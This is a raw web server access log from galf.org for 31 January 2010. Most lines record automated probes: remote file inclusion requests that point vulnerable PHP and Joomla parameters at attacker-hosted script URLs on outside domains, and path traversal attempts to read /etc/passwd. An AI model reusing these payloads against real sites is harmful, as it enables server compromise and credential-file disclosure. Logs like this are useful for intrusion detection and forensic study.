125.141.91.138 - - [31/Jan/2010:19:23:05 -0800] "GET /logs/access.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:23:23 -0800] "GET /logs//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:23:24 -0800] "GET /logs/access.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:23:24 -0800] "GET /3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:24:23 -0800] "GET /logs/access.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:24:23 -0800] "GET /logs//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:24:23 -0800] "GET /3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.45.154.10 - - [31/Jan/2010:19:24:37 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:19:25:08 -0800] "GET /logs/access_091116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:19:25:22 -0800] "GET /logs/access_100104.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:25:25 -0800] "GET /index.php?pag=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:25:26 -0800] "GET /index.php?pag=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:25:40 -0800] "GET /index.php?file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:25:41 -0800] "GET /index.php?file=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.48.135.50 - - [31/Jan/2010:19:32:05 -0800] "GET /logs/access_091102.log HTTP/1.1" 200 1441792 "http://galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "galf.org"
67.195.113.224 - - [31/Jan/2010:19:33:06 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.45.154.10 - - [31/Jan/2010:19:33:56 -0800] "GET /logs/access_091116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.45.154.10 - - [31/Jan/2010:19:34:06 -0800] "GET /logs/access_100104.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:35:06 -0800] "GET /logs/access_091214.log%20/index.php?arquivo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:35:06 -0800] "GET /logs/index.php?arquivo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:35:06 -0800] "GET /index.php?arquivo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:35:06 -0800] "GET /logs/access_091214.log%20/index.php?arquivo=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:35:06 -0800] "GET /index.php?arquivo=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:35:07 -0800] "GET /logs/index.php?arquivo=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
66.249.65.122 - - [31/Jan/2010:19:37:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:19:37:56 -0800] "GET /logs/access_091123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:19:37:56 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:19:37:56 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:40:59 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:40:59 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:40:59 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:41:15 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:41:15 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:41:15 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:41:18 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:41:18 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:41:18 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.108 - - [31/Jan/2010:19:42:38 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:43:24 -0800] "GET /logs/access_100125.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:43:29 -0800] "GET /logs/access_100125.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [31/Jan/2010:19:43:39 -0800] "GET /logs/access_100125.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:19:46:29 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:19:46:29 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:19:46:29 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:19:49:48 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:19:49:48 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:19:49:48 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:19:51:28 -0800] "GET /logs/access_100125.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:19:53:11 -0800] "GET /logs/access_100125.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:55:58 -0800] "GET /?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:55:58 -0800] "GET /?p=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:56:55 -0800] "GET /?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:56:56 -0800] "GET /?p=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:58:48 -0800] "GET /logs/access_091214.log%20/?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:58:49 -0800] "GET /?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:58:49 -0800] "GET /logs/access_091214.log%20/?p=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:58:49 -0800] "GET /?p=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:58:49 -0800] "GET /logs/?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4942 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:58:50 -0800] "GET /logs/?p=./../../../../../../../../etc/passwd HTTP/1.1" 200 4942 "-" "-" "www.galf.org"
220.80.108.81 - - [31/Jan/2010:20:00:18 -0800] "GET /logs//skin/happycast_category_bluishgreen/admin.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [31/Jan/2010:20:00:18 -0800] "GET /skin/happycast_category_bluishgreen/admin.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [31/Jan/2010:20:00:18 -0800] "GET /logs/access_091130.log//skin/happycast_category_bluishgreen/admin.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:20:01:18 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:20:03:15 -0800] "GET /logs/access_100125.log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:20:03:20 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.15 - - [31/Jan/2010:20:05:12 -0800] "GET /logs/access_100125.log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:20:11:57 -0800] "GET /index.php?pg=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:20:11:57 -0800] "GET /index.php?pg=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.80.193.30 - - [31/Jan/2010:20:12:12 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; InfoPath.2)" "www.galf.org"
87.250.252.242 - - [31/Jan/2010:20:14:15 -0800] "GET /logs/access_090907.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:20:16:31 -0800] "GET /logs/access_090720.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:20:16:31 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:20:16:31 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:19:00 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:19:00 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:19:00 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:19:21 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:19:21 -0800] "GET /logs/access_090803.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:19:21 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:19:29 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:19:29 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:19:29 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:19:34 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:19:34 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:19:34 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:19:38 -0800] "GET /logs/access_091207.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:19:43 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [31/Jan/2010:20:20:29 -0800] "GET /logs/access_091214.log/db.php?path_local=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.80.156.113 - - [31/Jan/2010:20:20:30 -0800] "GET /db.php?path_local=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.80.156.113 - - [31/Jan/2010:20:20:30 -0800] "GET /logs/db.php?path_local=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
114.80.156.113 - - [31/Jan/2010:20:21:08 -0800] "GET /logs/access_091221.log/db.php?path_local=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.250.92.167 - - [31/Jan/2010:20:22:25 -0800] "GET /logs/access_091221.log/db.php?path_local=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.250.92.167 - - [31/Jan/2010:20:22:26 -0800] "GET /db.php?path_local=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.250.92.167 - - [31/Jan/2010:20:22:26 -0800] "GET /logs/db.php?path_local=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.250.92.167 - - [31/Jan/2010:20:23:07 -0800] "GET /logs/access_091214.log/db.php?path_local=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:23:07 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:23:38 -0800] "GET /logs/access_090803.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:23:38 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:23:38 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:23:38 -0800] "GET /logs/access_091228.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [31/Jan/2010:20:23:56 -0800] "GET /logs/access_091207.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:25:29 -0800] "GET /logs/access_091116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:25:54 -0800] "GET /logs/access_100104.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [31/Jan/2010:20:25:57 -0800] "GET /logs/access_091123.log//mcf.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
220.80.108.81 - - [31/Jan/2010:20:25:57 -0800] "GET /mcf.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
220.80.108.81 - - [31/Jan/2010:20:25:57 -0800] "GET /logs//mcf.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
220.80.108.81 - - [31/Jan/2010:20:27:11 -0800] "GET /logs/access_090907.log//mcf.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:30:46 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:20:30:47 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:20:30:47 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:20:30:53 -0800] "GET /logs/access_090803.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:32:26 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:32:26 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:32:26 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:32:27 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:32:27 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:32:27 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.91.26 - - [31/Jan/2010:20:34:01 -0800] "GET /logs//include.php?DOCUMENT_ROOT=http://www.orosfm.com.br/home/editor/editor/dialog/fck_link/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.91.26 - - [31/Jan/2010:20:34:01 -0800] "GET /include.php?DOCUMENT_ROOT=http://www.orosfm.com.br/home/editor/editor/dialog/fck_link/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.91.26 - - [31/Jan/2010:20:34:14 -0800] "GET /logs/access_090914.log//include.php?DOCUMENT_ROOT=http://www.orosfm.com.br/home/editor/editor/dialog/fck_link/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:34:39 -0800] "GET /logs/access_090713.log//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:34:51 -0800] "GET /logs/access_090713.log//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.91.26 - - [31/Jan/2010:20:36:55 -0800] "GET /logs/access.log//include.php?DOCUMENT_ROOT=http://www.orosfm.com.br/home/editor/editor/dialog/fck_link/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.91.26 - - [31/Jan/2010:20:37:06 -0800] "GET /logs/access_100125.log//include.php?DOCUMENT_ROOT=http://www.orosfm.com.br/home/editor/editor/dialog/fck_link/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:44:16 -0800] "GET /logs/access.log%20%20//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
